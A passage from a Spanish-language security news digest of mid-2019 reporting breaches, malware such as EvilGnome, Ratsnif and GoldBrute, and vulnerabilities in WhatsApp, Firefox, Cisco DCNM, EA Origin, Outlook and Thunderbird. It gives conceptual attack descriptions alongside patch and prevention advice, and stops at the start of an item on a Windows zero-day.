El país ha sufrido el mayor ataque informático de su historia. Distintas fuentes discrepan del número total de afectados, aunque se estima en millones de personas, en un país cuyo censo asciende a aproximadamente a 7 millones. Como consecuencia del incidente y en virtud de la aplicación de la GDPR, laagencia tributaria búlgara se enfrenta a multas de hasta 20 millones de euros.

El presunto sospechoso trabaja como investigador en ciberseguridad y posee formación oficial para la lucha contra el cibercrimen organizado. No obstante, no es la primera vez que salta a la palestra. En 2017 intervino públicamente en televisión para hacer pública una vulnerabilidad encontrada en el Ministerio de Educación de su país, que previamente había reportado a los responsables gubernamentales sin obtener respuesta alguna. Ese incidente le sirvió para ser contratado como profesional de ciberseguridad por la empresa de informáticaTAD Group, donde seguía trabajando hasta el momento de su detención.

Los detalles técnicos del ataque aún se desconocen, aunque varias fuentes hablan de una filtración de, aproximadamente, 21Gb de información sensible y fiscal de la población búlgara. Igualmente, los diagnósticos en torno a la causa de la brecha difieren entre las partes. Existen declaraciones en el Twitter del atacante donde se alude a la nula securización de las infraestructuras búlgaras. Estas declaraciones, además, vienen avaladas por comentarios de responsables de seguridad gubernamentales que aluden a informes previos donde ya se alertaba del pésimo estado de la seguridad informática del país. En ese sentido, se habla de una filtración que afecta a casi el 70% de la población.

El presidente, sin embargo, afirma que el alcance del incidente es mucho menor del que ha trascendido a los medios y a reseñado la necesidad de contratar «cerebros únicos» como los del presunto atacante, para defender el país contra los crímenes informáticos.

Por otra parte, los técnicos que han tenido acceso a los datos y registros del ataque afirman que el atacante está lejos de haber demostrado cualquier virtuosismo durante la intrusión. Los técnicos insisten en que el atacante se ha limitado a hacer uso de técnicas realmente simples.

Más información:
https://www.24chasa.bg/novini/article/7565893
https://www.infobae.com/america/tecno/2019/07/18/un-hackeo-masivo-expuso-los-datos-de-millones-de-habitantes-en-bulgaria/

EvilGnome: un nuevo backdoor para usuarios de escritorio Linux

Es un hecho conocido que existen muy pocas cepas de malware de Linux en la naturaleza en comparación con los virus de Windows debido a su arquitectura central y también a su baja participación en el mercado, y muchos de ellos ni siquiera tienen una amplia gama de funcionalidades.

En los últimos años, incluso después de la revelación de graves vulnerabilidades críticas en varios tipos de sistemas operativos y software Linux, los ciberdelincuentes no lograron aprovechar la mayoría de ellos en sus ataques. Sin embargo, los investigadores de la firma de seguridad Intezer Labs descubrieron recientemente un nuevo implante de backdoor de Linux que parece estar en fase de desarrollo, pero ya incluye varios módulos maliciosos para espiar a los usuarios de este escritorio.

Funcionamiento de EvilGnome:

El malware en cuestión ha sido diseñado para tomar capturas de pantalla de escritorio, robar archivos, capturar grabaciones de audio desde el micrófono del usuario, así como descargar y ejecutar más módulos maliciosos.

Segun informan los propios investigadores de Intezer Labs, la muestra de EvilGnome que se descubrió en VirusTotal también contiene una funcionalidad de keylogger inacabada, lo que indica que su desarrollador lo cargó en línea por error.

El malware se disfraza como una extensión legítima de GNOME, un programa que permite a los usuarios de Linux ampliar la funcionalidad de sus escritorios.

El implante de Linux también gana persistencia en un sistema específico utilizando crontab, similar al programador de tareas de Windows, y envía datos de usuario robados a un servidor remoto controlado por un atacante.

Módulos utilizados:

  • ShooterSound : este módulo utiliza PulseAudio para capturar el audio del micrófono del usuario y carga los datos en el servidor de C&C del operador.
  • ShooterImage : este módulo utiliza la biblioteca de código abierto de Cairo para capturar capturas de pantalla y cargarlas en el servidor de C&C. Lo hace abriendo una conexión con el servidor de visualización XOrg, que es el backend del escritorio de Gnome.
  • ShooterFile : este módulo utiliza una lista de filtros para escanear el sistema de archivos en busca de archivos recién creados y los carga en el servidor de C&C.
  • ShooterPing : el módulo recibe nuevos comandos del servidor de C&C, como descargar y ejecutar nuevos archivos, establecer nuevos filtros para el escaneo de archivos, descargar y establecer una nueva configuración de tiempo de ejecución, exfiltrar la salida almacenada al servidor de C&C y detener la ejecución de cualquier módulo de disparo.
  • ShooterKey : este módulo no está implementado ni se usa, lo que probablemente es un módulo de registro de teclas sin terminar.

En particular, todos los módulos anteriores cifran sus datos de salida y descifran los comandos recibidos del servidor C&C con la clave RC5 «sdg62_AS.sa $ die3», utilizando una versión modificada de una biblioteca de código abierto rusa.

¿Cómo detectar si estás infectado por EvilGnome?

Para verificar si su sistema Linux está infectado con el software espía EvilGnome, puede buscar el ejecutable «gnome-shell-ext» en el directorio «~/.cache/gnome-software/gnome-shell-extensions«.

Dado que los productos de seguridad y antivirus actualmente no detectan el malware EvilGnome, los investigadores recomiendan a los administradores de Linux preocupados que bloqueen las direcciones IP de Comando y Control enumeradas en la sección IOC de la publicación del blog de Intezer.

Más información:

EvilGnome: Rare Malware Spying on Linux Desktop Users
https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/

Muestra EvilGnome en VirusTotal
https://www.virustotal.com/gui/file/7ffab36b2fa68d0708c82f01a70c8d10614ca742d838b69007f5104337a4b869/detection

Vulnerabilidad en WhatsApp y Telegram permite la manipulación de ficheros

Se ha descubierto una vulnerabilidad en WhatsApps y Telegram que permitiría el acceso y manipulación de los ficheros del usuario.

La vulnerabilidad ha sido descubierta por el equipo de seguridad de sistemas operativos modernos de la firma antivirus ‘Symantec’ y ya ha sido bautizada como ‘Media File Jacking’ y afecta a las aplicaciones WhatsApp y Telegram de la plataforma Android.

El error se da sólo en dos precisos instantes: En el momento en el que la aplicación ha recibido un fichero y lo está escribiendo en la unidad física, y en el momento en el que la aplicación está cargando los ficheros en la Interfaz de Usuario (UI).

Por defecto, la lectura y escritura se hacen en directorios públicos, siendo ‘/storage/emulated/0/WhatsApp/Media/’ el directorio por defecto de WhatsApps y ‘/storage/emulated/0/Telegram/’ el directorio de Telegram, directorios que por defecto son accesibles por una aplicación que tenga permiso para utilizar la memoria externa del teléfono.

Algún lector le habrá saltado la alarma preguntándose: “Si cualquier aplicación con permisos para manipular la unidad extraible… ¿Qué tiene de nuevo o cómo puede afectar la vulnerabilidad?”. Pues la clave está en el permiso ‘WRITEEXTERNALSTORAGE’ que permite la lectura en tiempo real de los archivos que se guardan en memoria sin importa si el fichero pertenece a la aplicación o no. Esto permitiría una manipulación de un fichero e incluso antes de ser mostrado al usuario, pudiendo tener unos efectos devastadores. Ya que el usuario podría tener plena confianza en que un fichero que acaba de recibir de una persona de confianza fuera malicioso.

De esta forma un ataque podría perpetrarse de la siguiente manera:

  • Un usuario descarga una aplicación (maliciosa) que requiera el permiso ‘WRITEEXTERNALSTORAGE’, cosa que no es nada fuera de lo normal.
  • El usuario a continuación recibe un mensaje de una persona de mucha confianza a través de una estas aplicaciones vulnerables, y que hoy en día son tan comunes en nuestro día a día, y que puede ser leída en tiempo real por la aplicación maliciosa recién instalada.
  • La aplicación maliciosa, lee y manipula el fichero recibido a voluntad antes de que sea mostrado al usuario, con el riesgo que pueda acarrear esta acción.

Los investigadores han publicado varios vídeos dónde pueden apreciarse la manipulación de varios ficheros: Una imagen, un documento PDF y un mensaje de voz.

Como posible contramedida se recomienda desactivar el guardado automático de los ficheros, para que en la medida de lo posible puedan ser recibidos en otras aplicaciones que no son vulnerables como las web o las de escritorio. Aunque lo más recomendable para ficheros confidenciales o con información sensible, es utilizar otro canal de comunicación.

Más información:

Symantec Mobile Threat: Attackers Can Manipulate Your WhatsApp and Telegram Media Files
https://www.symantec.com/blogs/expert-perspectives/symantec-mobile-threat-defense-attackers-can-manipulate-your-whatsapp-and-telegram-media

Ransomware a vista de pájaro

Cuando escuchamos la palabra ransomware a muchos de nosotros se nos erizan los pelos de los brazos al imaginar todos nuestros archivos secuestrados por algún ciberdelincuente que intenta sacar tajada.

A continuación veremos las principales vías de propagación que utilizan los atacantes para infectar a las víctimas y algunos consejos para intentar defendernos.

Propagación

Aunque existen diversas formas de propagación, alguna de ellas muy imaginativa, el vector más común de difusión es por correo electrónico.

Cabe destacar que, aunque paguemos el rescate por nuestros datos, nadie nos asegura que el atacante vaya a enviarnos la clave de descifrado. Además, si pagamos el rescate, es posible que el atacante vuelva a cifrar nuestros datos para volver a obtener su recompensa.

Ingeniería social – El archivo infectado suele adjuntarse al correo como .doc, .docx, .xls o .xlsx. se intenta persuadir al usuario para que abra el archivo y poder ejecutar las macros. Una vez se ejecutan el equipo queda infectado.

Malvertising – En esta variante el atacante crea una red publicitaria para distribuir el malware. El anuncio falso puede mostrarse en sitios legítimos, cuando el usuario hace click en el anuncio, el malware es descargado en el equipo.

Kits de exploiting – Los atacantes desarrollan código para aprovechar vulnerabilidades. Este tipo de ataque puede infectar a cualquier equipo conectado en red que tenga un software desactualizado.

¿Que pasa después de la descarga?

El ransomware tiene muchas formas de mostrarse al usuario, desde que empezó a popularizarse se ha ido actualizando para hacerlo más sofisticado y destructivo, por lo que no es de extrañar encontrarse casos de malware asociado en el que nuestro secuestro de datos venga acompañado de otros programas maliciosos que roben información, abran puertas traseras o instalen botnets que zombiefiquen nuestro terminal.

A continuación se nos puede pedir un pequeño rescate mediante el envío de un SMS, aunque con la constante evolución que ha sufrido este tipo de ataques ha ido perfeccionando el método de pago, por lo que, actualmente, suele pedirse la realización de una transferencia a un monedero electrónico. Esto permite maximizar la anonimización por parte del atacante.

A medida que se han ido sofisticando los métodos de pago también se han ido añadiendo mejoras al mecanismo de extorsión utilizado por los atacantes. En el último año, según Kaspersky, el número de ataques se quintuplicó. También se duplicaron los ataques a usuarios corporativos.

Este tipo de malware no solo cifra los datos de nuestro ordenador, cada vez se está popularizando más en dispositivos móviles e IoT.

¿Cómo puedo protegerme?

El ransomware suele trabajarse desde la prevención, por lo que las primeras medidas que se deben adoptar pasan por la concienciación y la formación, dos bloques imprescindibles que nos ayudarán a obetener buenos hábitos.

Dentro del bloque de formación se recomienda adquirir conocimientos que nos ayuden a identificar ataques de ingeniería social.

Consejos rápidos:

  • No abras correos de usuarios desconocidos y desconfía de los archivos adjuntos que contengan.
  • Mantén actualizado nuestro sistema.
  • Revisa los links antes de hacer click.
  • Asegúrate de tener contraseñas robustas.
  • Haz copias de seguridad con regularidad.

Desde el punto de vista más técnico tenemos que tener especial cuidado en la vigilancia de la infraestructura de nuestro sistema para asegurar que los servicios internos de la empresa no se vean expuestos al exterior.

Páginas en local permiten el robo de ficheros en Firefox desde hace 17 años

La vulnerabilidad sólo requiere abrir un fichero .html malicioso con el navegador para tener acceso a los archivos del directorio.

FX_Design_Blog_Header_1400x770.0

Según ha demostrado Barak Tawily, un analista de seguridad que ya reportó una vulnerabilidad similar, la implementación de Same Origin Policy (SOP) de Firefox para el esquema «file://» permite listar y acceder a ficheros del mismo directorio y subdirectorios. Un atacante podría mediante un fichero .html descargado de Internet y abierto con Firefox acceder a todos los archivos donde se descargó el documento.

La vulnerabilidad, que todavía no ha sido parcheada y no se espera que se solucione de momento, se debería a que el RFC de ‘SOP’ para el esquema «file://» no deja claro cual debe ser el comportamiento en estos casos, por lo que cada navegador acaba haciendo su propia implementación del estándar.

En la prueba de concepto (PoC) realizada por Tawily y grabada en vídeo puede comprobarse cómo abriendo un fichero ‘.html’ descargado y abierto desde las descargas de Firefox sin que se muestre ningún aviso es posible acceder a ficheros sensibles del directorio sin que el usuario se dé cuenta.

El fallo en realidad no es nuevo, pues ya fue reportado en Netscape 6 y Mozilla en el 2002, reportándose en nuevas ocasiones con el mismo efecto.

De momento la única solución es no abrir ficheros ‘.htm’ o ‘.html’ de local utilizando Firefox. Una posible alternativa, y sólo si es estrictamente necesario, sería copiar el archivo a una carpeta vacía, y abrirlo desde dicha carpeta.

Más información:

Firefox Local Files Theft – not patched yet:
https://quitten.github.io/Firefox/

Dos ciudades de Florida pagaron más de un millón de dólares a cibercriminales debido a ataques de rasomware

Florida ha pagado, en dos semanas, más de 1,1 millones de dólares en bitcoins a cibercriminales para así poder recuperar archivos que han sido cifrados tras un ataque de ransomware. Las ciudades afectadas han sido Riviera Beach y Lake City.

Lake City, una ciudad al norte de Florida, pagó el pasado lunes 24 de junio 42 bitcoins, que es el equivalente a unos 573,300 dólares, para descifrar teléfonos móviles y correos que fueron cifrados tras un ransomware que paralizó sus sistemas informáticos durante 2 semanas.

Este ataque se denominó «Triple Amenaza» puesto que combinaba tres métodos diferentes para atacar a los sistemas conectados en red. Esta infección que afectó a Lake City fue llevada a cabo después de que un empleado del ayuntamiento abriera un correo electrónico malicioso el pasado 10 de junio.

Aunque el equipo de soporte desconectó los ordenadores 10 minutos después de que comenzase el ataque, ya era demasiado tarde, el ataque se expandió y bloqueó las cuentas de correo y de los servidores de los trabajadores de la ciudad.

Como los departamentos de Policía y Bomberos trabajaban desde una red y servidor distintos (disponían de una red y estructura de servidores segmentada), fueron los únicos que no fueron afectados por el ataque. Por otro lado, otras redes de Lake City están actualmente deshabilitadas. También es importante destacar que los servicios de Seguridad Pública no se han visto afectados por el ataque.

Los cibercriminales contactaron con la aseguradora de la ciudad y negociaron el pago de un rescate de 42 bitcoins. Los funcionarios de Lake City votaron el lunes 24 pagar el rescate y poder así recuperar el acceso a los archivos.

Este pago por el rescate estaría cubierto principalmente por el seguro, aunque los contribuyentes incurrirían en 10,000$.

Lake City es la segunda ciudad de Florida afectada por el ransomware. La otra ciudad fue Riviera Beach, la cual fue víctima de un ataque de ransomware el 29 de mayo después de que otro empleado abriese un link malicioso dentro de un correo cuidadosamente elaborado para efectuar el ataque.

Este ataque bloqueó los ordenadores de la ciudad por, al menos, 3 semanas. Tras estos sucesos, el Ayuntamiento de la ciudad autorizó a la aseguradora de la ciudad para que pagase el rescate de 65 Bitcoins (897,650 dólares actualmente) para poder recuperar el acceso a sus sistemas bloqueados.

En lugar de pagar el rescate, la recomendación es disponer de copias de seguridad que se realicen de forma periódica en dispositivos independientes y cifrados que no estén conectados a la red, así cómo disponer de un plan de contingencia y formar a los empleados para que no abran correos que puedan ser sospechosos al igual que no abrir todos los archivos que se reciban.

OceanLotus APT usa el RAT Ratsnif en sus ataques.

El troyano de acceso remoto llamado Ratsnif, usado es campañas de ciber-espionaje, tiene ahora nuevas capacidades; permite modificar paginas web y secuestro SSL.

OceanLotus es un grupo de hacking que se cree que actua en nombre del estado Vietnamita en las operaciones de espionaje.

También conocido como APT32, CobalKitty, SeaLotus y APT-C-00 en la comunidad infosec, los atacantes típicamente combinan malware único con utilidades comerciales como Cobalt Strike.

Investigadores de Blackberry Cylance analizaron cuatro variantes de la familia de Ratsnif donde se muestra como evoluciona de un build de debug a una version release con capacidades como tráfico de paquetes, ARP, DNS y MAC spoofing, redirección e inyección HTTP y habilitar una shell de acceso remoto.

Las tres primeras versiones que Cylance vió tienen una fecha de compilación de 2016, mientras que la última, también reportada por Macnica Networks, era de agosto de 2018.

La versión más antigua de Ratsnif vista por los investigadores es una build debug que fue compilada el 5 de agosto de 2016; el dominio para el servidor C2 fue activado el mismo día.

Menos de un día después, apareció una nueva versión con cambios menores. Ambas muestras se escanearon en VirusTotal en busca de detecciones.

Un tercer desarrollo, con fecha de compilación el 13 de Septiembre de 2016, era muy similar en funcionalidad con las dos muestras previas. Los investigadores creen que es una de las primeras versiones desplegadas de Ratsnif por el grupo OceanLotus.

No tiene todas las capacidades de la última versión pero podía configurar una shell remota y servir para ARP spoofing, DNS spoofing y redirección HTTP.

Más Información:

https://www.bleepingcomputer.com/news/security/oceanlotus-apt-uses-new-ratsnif-trojan-for-network-attacks/

Noticias de Seguridad Junio 2019

Bug crítico en Cisco Data Center Network Manager (DCNM)

Se han descubierto varias vulnerabilidades en la interfaz web de administración de Cisco Data Center Network Manager (DCNM) que permitirían a un atacante remoto robar la cookie de sesión activa saltándose la autenticación, subir archivos, y como consecuencia ejecutar código remoto como usuario root.

DCNM es el sistema de administración de red para todos los sistemasNX-OS que utilizan el hardware Nexus de Cisco en los centros de datos.Se encarga de solucionar problemas, detectar errores de configuración, etc. Por lo que es una parte importante para las organizaciones que utilizan Nexus switches.

La primera vulnerabilidad descubierta (CVE-2019-1619) permite a un atacante robar la cookie de sesión activa sin necesidad de conocer el usuario administrativo o contraseña. Para ello es necesario enviar una petición HTTP especialmente diseñada a un web servlet especifico que se encuentre en los dispositivos afectados.

Versiones afectadas:
– Cisco eliminó el uso del web servlet afectado en la versión 11.1, por lo que afecta a todas las versiones inferiores a 11.1

Por otro lado, la vulnerabilidad clasificada como CVE-2019-1620 se debe a una configuración incorrecta de los permisos en el software DCNM. Aprovechando este error, un atacante podría crear y escribir archivos mediante el envío de datos a un servlet web específico que se encuentra en los dispositivos afectados. De esta manera es posible incluso ejecutar código remoto con privilegio root.

Versiones afectadas:
– En las versiones inferiores a 11.1 de DCNM les afecta este fallo, pero es necesario autenticarse para aprovechar esta vulnerabilidad.
– En la versión 11.1 de DCNM no es necesario estar autenticado para acceder al servlet web afectado y explotar dicha vulnerabilidad.

En la versión 11.2 Cisco elimina la utilización del servlet web afectado delsoftware, con lo que queda parcheada dicha vulnerabilidad.

Por el momento el equipo PSIRT de Cisco no tienen conocimiento del uso malicioso de estas vulnerabilidades hasta el momento. Cisco también recomiendan actualizar a la última versión, indicando en su página web los pasos a seguir.

Más información:

Cisco Data Center Network Manager Authentication Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass

Cisco Data Center Network Manager Arbitrary File Upload and Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex

New Cisco critical bugs: 9.8/10-severity Nexus security flaws need urgent update
https://www.zdnet.com/article/new-cisco-critical-bugs-9-810-severity-nexus-security-flaws-need-urgent-update/

La policía alemana asalta la casa del desarrollador de OmniRAT

La policía alemana ha asaltado recientemente la vivienda en la que residía el desarrollador de la herramienta de administración remota para Android, MacOS, Linux y Windows «OmniRAT».

El desarrollador de la herramienta de administración remota (RAT), OmniRAT, fue sorprendido en el día de ayer en su casa por la policía de alemana. La policía asaltó su casa y precintó sus dispositivos: un portátil, un ordenador de sobremesa y algunos teléfonos móviles.

OmniRAT comenzó, en Noviembre de 2015, como un software para el control remoto de sistemas de forma legítima, pensada como una herramienta para administradores de sistemas. Se convirtió rápidamente en la herramienta más popular para administrar y monitorizar dispositivos Windows, Android, MacOS y Linux.

A principios de año, la herramienta fue utilizada por un grupo de delincuentes con fines maliciosos, instalándose a través de un exploit que aprovechaba una antigua vulnerabilidad de Microsoft Excel (CVE-2016-7262) , y al igual que otras herramientas similares, se ha acabado usando como RAT en diferentes ataques.

En uno de los ataques realizados en Enero de este año, y de acuerdo a un reporte realizado por un investigador de seguridad, los ficheros Excel utilizados para explotar la vulnerabilidad suplantaban a la empresa «Kuwait Petroleum Corporation» (KPC). De esta forma, los atacantes trataban de hacer más creíble el fichero para que las víctimas abriesen el fichero y fuesen infectados.

Aunque la compañía KPC no estuvo afectada por el ataque, si que se usó su nombre para la realización del ataque, por lo que los abogados de la compañía solicitaron al registrante del dominio de OmniRAT que proporcionasen los datos del dueño.

Aunque en su web el autor de la herramienta informa de que se trata de una herramienta legítima y que no tiene nada que ver con un troyano, parece que podría tener problemas legales debido al mal uso de la herramienta por parte de cibercriminales.

Actualmente se desconoce si la acción de la policía se produjo por la investigación realizada por KCP o si se debe a otro caso diferente que afecte al desarrollador.

Más información:

Exclusive: German Police Raid OmniRAT Developer and Seize Digital Assets
https://thehackernews.com/2019/06/police-raid-omnirat-developer.html

Descubierta vulnerabilidad de robo de cuentas en Origin

La popular plataforma de videojuegos Origin utilizada por cientos de millones de personas en todo el mundo era vulnerable a múltiples fallos de seguridad que podrían haber permitido a un usuario malintencionado tomar el control de las cuentas de otros jugadores y robar datos confidenciales.

Las vulnerabilidades descubiertas por investigadores de CheckPoint y CyberInt se pueden encadenar, de manera que, se puede secuestrar la cuenta de EA de la víctima simplemente convenciéndola de que haga click en un enlace.

Explotación de la vulnerabilidad:

Para realizar este ataque, tal y como se muestra en el siguiente vídeo, los investigadoresaprovecharon una vulnerabilidad no parcheada en el servicio en cloud Azure que les permitió tomar el control de uno de los subdominios de EA.

PoC:

El conocido fallo de Azure se puede explotar aprovechando que el CNAME del DNS de un dominio/subdominio apunte a la plataforma Azure pero este no se haya configurado/vinculado a una cuenta activa de este cloud, en este caso cualquier otro usuario de la plataforma puede secuestrarlo para estacionar ese subdominio en su propio host de Azure.

En la prueba de concepto, los investigadores secuestraron «eaplayinvite.ea.com» ypresentaron un script en él que aprovechaba las debilidades en el inicio de sesión único (SSO) de los juegos de EA y el mecanismo TRUST.

La página web finalmente permitió a los investigadores capturar tokens secretos de SSO de los jugadores con solo convencerlos de que los visitaran en el mismo navegador web en el que ya tienen una sesión activa en el sitio web de EA y tomar sus cuentas sin requerir credenciales reales.

En el peor de los casos, los investigadores de CheckPoint dijeron que un atacante podría haber explotado estas fallas para causar daños potenciales, como obtener acceso a la información de la tarjeta de crédito de los jugadores con la capacidad de comprar de manera fraudulenta la moneda del juego en nombre de los jugadores.

CyberInt y CheckPoint informaron inmediatamente de sus hallazgos a EA Games y ayudaron a la compañía a solucionar las lagunas de seguridad para proteger a sus clientes. La firma de seguridad se hizo pública hoy con sus hallazgos, casi tres meses después de que EA abordara los problemas.

Más información:

EA Origin exploit potentially exposed 300 million users to attack
https://www.itpro.co.uk/security/33916/ea-origin-exploit-potentially-exposed-300-million-users-to-attack

Resuelta vulnerabilidad de Outlook para Android que permitía la ejecución remota de código

Extraído de thehackernews.com

Seis meses después de ser identificada la vulnerabilidad CVE-2019-1105, Microsoft ha lanzado una versión actualizada de Outlook for Android, aplicación de correo electrónico usada actualmente por más de 100 millones de usuarios.

Por lo tanto, las versiones anteriores a la 3.0.88 para Android siguen manteniendo esta vulnerabilidad de cross-site scripting (XSS) anunciada en enero de 2019, que permitiría a un tercero inyectar código JavaScript o similar aprovechando la forma en que Outlook analiza los mensajes de correo electrónico entrantes. Para ello, el atacante remoto podría lograr la ejecución de código en la aplicación del dispositivo desde el lado del cliente con el envío de correos electrónicos que tuviesen un formato concreto.

«The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user.»

Según Microsoft, esta vulnerabilidad que podría ser aprovechada para realizar ataques de suplantación de identidad, fue convenientemente informada de manera responsable por múltiples investigadores de seguridad de manera independiente, incluyendo a Bryan Appleby de F5 Networks, Sander Vanrapenbusch, Tom Wyckhuys, Eliraz Duek de CyberArk y Gaurav Kumar. Además, han declarado de que no les consta ningún ataque relacionado con la CVE-2019-1105, aunque se recomienda actualizar lo antes posible la aplicación Outlook desde Google Play Store en caso de que no se haya producido aún la actualización automática.

Más información:

Bug en la librería criptográfica de Microsoft permite hacer denegación de servicio

Tavis Ormandy, investigador de seguridad de Google Project Zero, ha descubierto un bug en «SymCrypt», la librería criptográfica principal de Microsoft a partir de Windows 8.

Este bug en «SymCrypt» permite realizar una denegación de servicio en la aplicación que utilice la librería, e incluso forzando al usuario en algunos casos a reiniciar el sistema operativo.

Al tratarse de una vulnerabilidad que no permite ejecutar código malicioso, el propio investigador considera el bug como una vulnerabilidad de baja severidad. Aunque en ciertos casos, como es el caso de software para servidores como «Internet Information Services», una vulnerabilidad de denegación de servicio puede ser un problema importante.

El error se encuentra en la función «SymCryptFdefModInvGeneric», encargada de hacer el calculo del inverso modular. Durante el calculo del inverso modular, se produce un bucle infinito al realizar los cálculos en ciertos patrones de bits.

Tavis Ormandy ha realizado pruebas generando un certificado X.509 que explota la vulnerabilidad, y que al incluirlo en, por ejemplo, un mensaje S/MIME permite realizar una denegación de servicio a un servicio de Windows.

Según el investigador de Google, el fallo se reportó a Microsoft hace 91 días, tras los cuales, Microsoft no ha liberado ningún parche que resuelva el problema. Por ello, después de estos 91 días, se ha liberado la información acerca de la vulnerabilidad. Según Microsoft, el parche que resuelve este error se publicará junto al resto de parches de seguridad el 9 de julio.

Más información:

Issue 1804: cryptoapi: SymCrypt modular inverse algorithm
https://bugs.chromium.org/p/project-zero/issues/detail?id=1804

Vulnerabilidades en Thunderbird

Mozilla Foundation ha publicado el boletín de seguridad MFSA2019-17 que solventa 4 fallos en su popular cliente de correo, Thunderbird. Tres de estas vulnerabilidades han sido clasificadas de gravedad alta.

Mozilla Thunderbird es un cliente de correo electrónico multiplataforma de código abierto y libre, cliente de noticias, cliente de RSS y de chat desarrollado por la Fundación Mozilla.

Las vulnerabilidades, presentes en la implementación de iCal, son las siguientes:

* CVE-2019-11703: un desbordamiento de memoria en la función ‘parser_get_next_char’ localizada en el fichero ‘icalparser.c’ al procesar un calendario adjunto podría permitir la ejecución de código remoto.

* CVE-2019-11704: una falta de comprobación de límites en la función‘icalmemory_strdup_and_dequote’ en ‘icalvalue.c’ cuando la cadena de entrada finaliza con el carácter ‘\’ podría provocar la lectura y escritura fuera de límites de la memoria, de referencia a puntero nulo, y corrupción de la memoria. La explotación exitosa de este fallo de seguridad podría permitir la ejecución de código remoto.

* CVE-2019-11705: una validación incorrecta en la función ‘icalrecuradd_bydayrules’ localizada en ‘icalrecur.c’ podría permitir la ejecución de código remoto.

* CVE-2019-11706: una confusión de tipos en la función ‘icaltimezone_get_vtimezone_properties’ en ‘icalproperty.c’ al analizar un archivo adjunto de calendario con formato incorrecto podría ser aprovechada para revelar información sensible.

Estos fallos de seguridad han sido reportados por Luis Merino de X41 D-SEC, quien además ha proporcionado pruebas de concepto para cada uno de ellos en GitHub.

Thunderbird 60.7.1, que corrige todas las vulnerabilidades expuestas, está disponible para su descarga desde la página oficial.

Nueva Botnet ataca mediante fuerza bruta servidores RDP

Investigadores de seguridad han descubierto una botnet que está llevando a cabo una campaña de fuerza bruta contra mas de un millón y medio de servidores RDP públicamente accesibles desde Internet.

Bautizada como GoldBrute, se ha diseñado de forma que escala gradualmente añadiendo cada máquina comprometida a la botnet y forzándolas a encontrar nuevos servidores RDP e intentar atacarlos por fuerza bruta.

Para pasar desapercibida, los atacantes detrás de esta campaña ordenaban a cada máquina infectada a hacer fuerza bruta a millones de servidores RDP con un conjunto único de pares de usuario y contraseña de modo que el servidor atacado recibe intentos de conexión desde direcciones IP diferentes cada vez.

La campaña, descubierta por Renato Marinho, de Morphus Labs, funciona de la siguiente forma:

Paso 1 – Después de acceder a un servidor RDP usando fuerza bruta, el atacante instala una botnet basada en Java en la máquina.

Paso 2 – Para controlar las máquinas infectadas, los atacantes utilizan un servidor C2 (command and control) con el que intercambiar ordenes e información sobre un WebSocket con cifrado AES.

Paso 3 y 4 – Cada máquina infectada recibe como primera tarea escanear y reportar al servidor C2 una lista de al menos 80 servidores RDP públicamente accesibles que pueden ser atacados por fuerza bruta.

Paso 5 y 6 – Los atacantes asignan a cada máquina infectada con un par único de usuario/contraseña como segunda tarea, para intentar hacer fuerza bruta contra la lista de servidores RDP que la máquina infectada recibe del servidor C2.

Paso 7 – En los casos en los que la credencial haya funcionado, se reporta la información de vuelta al servidor C2.

En este momento, una búsqueda rápida en Shodan arroja 2.4 millones de servidores RDP que pueden ser accedidos públicamente y probablemente más de la mitad de ellos estén siendo atacados por fuerza bruta.

Más Información:

https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d

https://thehackernews.com/2019/06/windows-rdp-brute-force.html

Finaliza UAD360, el primer congreso de seguridad informática de la provincia de Málaga.

El evento acogió el pasado fin de semana a cerca de 300 personas que se desplazaron desde muchos puntos de España para acudir al primer congreso de estas características en la provincia de Málaga.

Soledad Antelada, de Berkeley Lab, durante su ponencia en UAD360

Durante los días 7 y 8 de Junio ha tenido lugar en Málaga el congreso UAD360, el primer congreso de la provincia de Málaga netamente orientado a la seguridad informática, organizado por Hispasec y la Universidad de Málaga, y que contó con el patrocinio deBuguroo apoyo de Extenda y el Instituto Nacional de Ciberseguridad (INCIBE). El evento contó con la acogida de cerca de 300 personas venidas de distintos puntos de España, que acudieron puntuales a la cita.

UAD360 tuvo la suerte de contar para su primera edición con algunos de los profesionales más reputados del sector, que pusieron al alcance de los asistentes contenidos inéditos con un alto grado de especialización, innovación y calidad técnica.

Así, durante toda la jornada del sábado, el aula magna de la Facultad de Derecho se llenó para escuchar a Soledad Antelada, ingeniera en ciberseguridad del Berkeley National Lab, Bernardo Quintero, fundador de Virus Total, Sergio de los Santos, director de Innovación y Ciberseguridad en ElevenPaths (Telefónica Digital), David Santos, experto en seguridad informática implicado en el área de ciberseguridad de la Guardia Civil y Fernando Díaz, ingeniero de software en Virus Total.

Algunos de los temas tratados en las ponencias fueron la securización de la infraestructura de la red más rápida del mundo, las posibilidades – y brechas – en la anonimización permitida por la red TOR, el análisis del caso Wannacry, el estudio de código aplicado al hacking en videojuegos o la relevancia de vectores de ataque como la ingeniería social en los escenarios actuales de ciberdefensa, entre otros muchos que fueron sacados a la luz por el público asistente, durante la posterior mesa redonda con los ponentes y autoridades en la materia.

Si durante el sábado, la atención del congreso estuvo dirigida a estas ponencias, el viernes pudo disfrutarse de talleres prácticos repartidos en distintas aulas de la facultad. En este sentido, el público pudo comprobar en directo cómo se realiza una intrusión completa en una variedad de sistemas Windows, entender en profundidad cómo explotar vulnerabilidades en software para GNU/Linux mediante reversing y exploiting y la influencia y posibilidades de la Inteligencia Artificial en el campo de la seguridad informática.

De forma paralela, tuvo lugar un CTF, una competición por equipos donde los participantes hicieron gala de sus habilidades para resolver un total de 25 retos de temática variada (criptografía, análisis forense o exploiting, entre otras). Se entregaron, además, premios a los tres equipos que tuvieran la puntuación más alta, por valor de más de 4000€ entre suscripciones al servicio Koodous, periféricos tecnológicos y merchandising.

El evento terminó con una fiesta a la que estaban invitados todos los asistentes, que supuso una ocasión perfecta para acercarse de un modo menos académico y más distendido a la seguridad informática, a los especialistas que allí se dieron cita y de contactar con multitud de equipos de hacking que acudieron al evento desde distintos puntos de España.

Filtrado otro zero-day de Windows para CVE-2019-0841

La investigadora en seguridad informática que opera bajo el pseudónimo de SandboxEscaper, publica una nueva vulnerabilidad para realizar un bypass contra algunas medidas de seguridad de sistemas operativos Windows.

